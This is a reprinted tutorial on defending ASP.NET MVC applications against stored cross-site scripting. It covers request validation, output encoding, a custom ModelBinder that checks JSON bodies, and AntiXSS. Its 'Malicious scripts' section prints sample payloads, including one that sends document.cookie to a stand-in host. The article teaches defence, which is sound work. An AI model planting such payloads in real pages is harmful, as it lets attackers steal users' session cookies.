Web Security (1): cross-site scripting (XSS) and security-related xss

Source: Internet
Author: User


Introduction
Cross-Site Scripting is abbreviated XSS rather than CSS, to avoid confusion with Cascading Style Sheets. In an XSS attack, an attacker gets malicious script into a web page; when a user browses that page, the embedded script runs in the user's browser with the page's origin, which lets the attacker achieve whatever the script was written for, for example read the user's cookies, redirect the user to a malicious website, or deliver a Trojan.

Some scenarios

1. An attacker inserts malicious code into his own profile. Any user who views that profile executes the code.
2. An attacker posts an article with an eye-catching title and puts malicious code in the body. Any user who opens the article executes the code.
3. An attacker inserts malicious code into a reply or comment on a popular article or post. Any user who reads the reply executes the code.

In all three cases the script is stored by the site and served to every later visitor, which is why the rest of this article concentrates on what happens when data enters the database and when it is rendered back out.

Two stages of XSS prevention

1. Validate data when it is submitted. If the data contains script, refuse to store it. ASP.NET MVC performs this check by default through request validation: if you try to submit a value containing a script tag, the request fails with an HttpRequestValidationException. Note: the method in the red box in Figure 2 is discussed later.

Figure 1

Figure 2

If you do want to allow script to be stored (for example, content from a rich-text editor), add [ValidateInput(false)] to the corresponding action. The stored script still cannot do any harm, because the second stage of prevention catches it on the way out.

Figure 3

Figure 4

2. HTML-encode data when it is output, so that stored script is rendered as text instead of being executed. Razor's @ syntax HTML-encodes by default. However, if the content is output through Html.Raw(), the encoding is bypassed and a stored malicious script will run. Note that HTML encoding is the right encoding for the HTML body and quoted attribute values; data placed inside a JavaScript block or a URL needs the encoding for that context instead.

Figure 5

Figure 6

Malicious scripts

1. A simple pop-up or content display.
<script>alert('you are hacked!')</script>
 
2. Navigate to a malicious website. Note: Baidu is used here only as a navigation target for the demonstration; it is not a malicious website.
<script>window.location.href = 'http://www.baidu.com';</script>
 
3. Obtain cookies. The first payload only shows them; the second sends them to a site the attacker controls.
<script>alert(document.cookie)</script>
<script>window.location.href = 'http://www.example.com?cookies=' + document.cookie;</script>

A cookie marked HttpOnly is not exposed through document.cookie, so the second payload only captures cookies that lack that flag; session cookies should always carry it.

Does request validation fail for $.ajax?

Assume we keep the default behaviour, so data containing script must not reach the database, but we submit the data with jQuery's $.ajax as JSON instead of a normal form post.

Figure 7

Figure 8

Figure 9

Figure 10

The data is still in the database. Why? Let's look at the method in the red box in Figure 2.

Figure 11

Figure 12

Figure 12 suggests that MVC's default request validation inspects the form fields and query string of the Request, the parts covered by Request.ValidateInput(). The data sent by jQuery ajax as JSON is in the request body and is read by the JSON value provider, so the default validation never sees it.

Implementing data validation for $.ajax

To validate $.ajax data, I start from a custom ModelBinder. The code is as follows:

using System;
using System.ComponentModel;
using System.Web;
using System.Web.Mvc;

public class AjaxModelBinder : DefaultModelBinder
{
    protected override bool OnPropertyValidating(ControllerContext controllerContext, ModelBindingContext bindingContext, PropertyDescriptor propertyDescriptor, object value)
    {
        var contentType = controllerContext.HttpContext.Request.ContentType;

        // Only string properties bound from a JSON body need the extra check;
        // form and query-string values are already covered by the default
        // request validation. ValidateRequest is false when the action carries
        // [ValidateInput(false)], and RequestValidationEnabled is false for a
        // property marked [AllowHtml], so both opt-outs are honoured here too.
        // The media type is compared with StartsWith rather than Equals, because
        // JsonValueProviderFactory accepts "application/json; charset=utf-8" and
        // an exact comparison would let such a request skip this check.
        if (contentType != null &&
            contentType.StartsWith("application/json", StringComparison.OrdinalIgnoreCase) &&
            value is String &&
            controllerContext.Controller.ValidateRequest &&
            bindingContext.PropertyMetadata[propertyDescriptor.Name].RequestValidationEnabled)
        {
            if (IsDangerousString(value.ToString()))
            {
                throw new HttpRequestValidationException("Potentially dangerous value detected in the request!");
            }
        }

        return base.OnPropertyValidating(controllerContext, bindingContext, propertyDescriptor, value);
    }

    /// <summary>
    /// Refer to the method "System.Web.CrossSiteScriptingValidation.IsDangerousString".
    /// Flags '<' followed by a letter, '!', '/' or '?' (a tag, comment, end tag or
    /// processing instruction) and '&#' (a numeric character reference).
    /// </summary>
    private static bool IsDangerousString(string str)
    {
        var startingChars = new[] { '<', '&' };
        var startIndex = 0;

        while (true)
        {
            var index = str.IndexOfAny(startingChars, startIndex);

            if (index < 0)
            {
                return false;
            }

            if (index == (str.Length - 1))
            {
                return false;
            }

            var ch = str[index];

            if (ch != '&')
            {
                if ((ch == '<') && (IsAtoZ(str[index + 1]) || (str[index + 1] == '!') || (str[index + 1] == '/') || (str[index + 1] == '?')))
                {
                    return true;
                }
            }
            else if (str[index + 1] == '#')
            {
                return true;
            }

            startIndex = index + 1;
        }
    }

    private static bool IsAtoZ(char c)
    {
        return ((c >= 'a') && (c <= 'z')) || ((c >= 'A') && (c <= 'Z'));
    }
}

Then register AjaxModelBinder in Global.asax.cs.

Figure 13

Now a malicious script in the JSON input data is detected as well.

 

Figure 14

I copied the IsDangerousString method in AjaxModelBinder from the .NET source code (System.Web.CrossSiteScriptingValidation).

 

Figure 15

The AntiXSS library

If you use .NET 4.5 or later, you do not need to add the AntiXSS library separately, because the framework includes its encoder as System.Web.Security.AntiXss.AntiXssEncoder. On earlier versions you need to add the AntiXSS library yourself. In either case the encoder only replaces the default HTML encoding used by HttpUtility and Razor if it is registered through the encoderType attribute of the httpRuntime element in Web.config.

Source code download

For ease of use, the sample does not use a database; it stores the data in a file. After downloading the code, it runs directly without any configuration.

https://github.com/ErikXu/XSS


Article Reprinted from: http://www.cnblogs.com/Erik_Xu/p/5403773.html
